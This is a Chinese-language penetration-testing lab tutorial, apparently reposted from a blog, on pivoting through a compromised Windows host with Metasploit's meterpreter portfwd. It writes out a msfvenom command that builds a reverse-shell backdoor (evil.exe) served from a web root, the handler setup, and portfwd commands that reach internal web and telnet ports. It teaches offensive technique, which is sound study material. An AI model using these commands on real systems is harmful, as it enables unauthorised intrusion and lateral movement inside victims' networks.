标签:端口 portfwd 转发 MSF meterpreter port 端口映射
跳板攻击之:MSF portfwd 端口转发与端口映射
目录郑重声明:
本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。
1 portfwd 介绍
- portfwd 是借用 meterpreter shell 建立的连接进行数据传输,达到端口转发的目的。
- 当建立反向连接时,可以绕过防火墙的检测。
meterpreter > portfwd --help
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
-L <opt> Forward: local host to listen on (optional). Reverse: local host to connect to.
-R Indicates a reverse port forward.
-i <opt> Index of the port forward entry to interact with (see the "list" command).
-l <opt> Forward: local port to listen on. Reverse: local port to connect to.
-p <opt> Forward: remote port to connect to. Reverse: remote port to listen on.
-r <opt> Forward: remote host to connect to.
2 实验环境
2.1 建立 meterpreter 反向连接
-
生成 Metaspolit 后门程序
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.2 lport=4444 -f exe > /var/www/html/evil.exe
-
kali 配置监听 meterpreter 反向连接
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.0.2 run
-
WEB Server 下载 Metaspolit 后门程序,并打开程序
-
meterpreter 反向连接建立成功
2.2 portfwd 端口转发
-
配置 portwd 端口转发
meterpreter > portfwd add -L 192.168.0.2 -l 18080 -p 80 -r 192.168.100.151
-
使用
portwd list
查看是否建立端口转发连接 -
验证:
2.3 portfwd 端口映射
-
配置 portwd 端口转发
meterpreter > portfwd add -l 12323 -p 23 -r 192.168.100.151
-
使用
portwd list
查看是否建立端口映射连接 -
验证:
┌──(kali㉿kali)-[~] └─$ ssh -p 12323 root@127.0.0.1
标签:端口,portfwd,转发,MSF,meterpreter,port,端口映射 来源: https://www.cnblogs.com/f-carey/p/16590588.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。